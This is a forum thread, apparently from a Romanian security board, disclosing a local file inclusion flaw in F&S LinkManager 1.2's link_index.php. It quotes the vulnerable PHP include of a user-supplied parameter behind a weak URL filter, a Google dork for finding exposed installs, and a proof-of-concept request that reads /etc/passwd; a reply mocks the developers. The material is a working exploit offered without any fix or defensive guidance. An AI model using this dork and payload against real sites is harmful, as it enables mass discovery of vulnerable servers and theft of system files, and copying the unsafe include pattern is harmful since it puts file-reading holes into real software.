Jump to content
Guest Kenpachi

[RST] [LFI]F&S LinkManager 1.2 Final Gold Edition

By Guest Kenpachi, in Proiecte RST

Recommended Posts

Guest Kenpachi

Guest Kenpachi

Posted
Posted 

Software : F&S LinkManager 1.2 Final Gold Edition
BUG Type : Local File Inclusion
BUG In   : link_index.php
BUg      :

$show = $HTTP_GET_VARS['show'];

if ($show == ""){
	[...]
}
else {
[RFI FILTER 
$oldshow = $show;
$oldsize = strlen($show);
$show = str_replace("http://", "" , $show);
$show = str_replace("www", "" , $show);
$show = str_replace("ftp://", "" , $show);
$show = str_replace("https://", "" , $show);
$newsize = strlen($show);

if($oldsize == $newsize)
{
[NO LFI FILTER ]
include "$show";
}

Google Dork : inurl:"link_index.php?show"

POC : [url]www.example.com/[/url][path]/link_index.php?show=/etc/passwd


//Kenpachi @ RSTCENTER.COM
NO GREETS, JUST ME

la recomandarea lui stroke uitati si link sa downloadati softwareul in cauza :
[url]http://rapidshare.com/files/138499333/linklist.zip.html[/url]

kw3rln Newbie

kw3rln

Posted
Posted

nice find

cam copaci programatorii aia :))

else {
[RFI FILTER 
$oldshow = $show;
$oldsize = strlen($show);
$show = str_replace("http://", "" , $show);
$show = str_replace("www", "" , $show);
$show = str_replace("ftp://", "" , $show);
$show = str_replace("https://", "" , $show);
$newsize = strlen($show);

if($oldsize == $newsize)
{
[NO LFI FILTER ]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...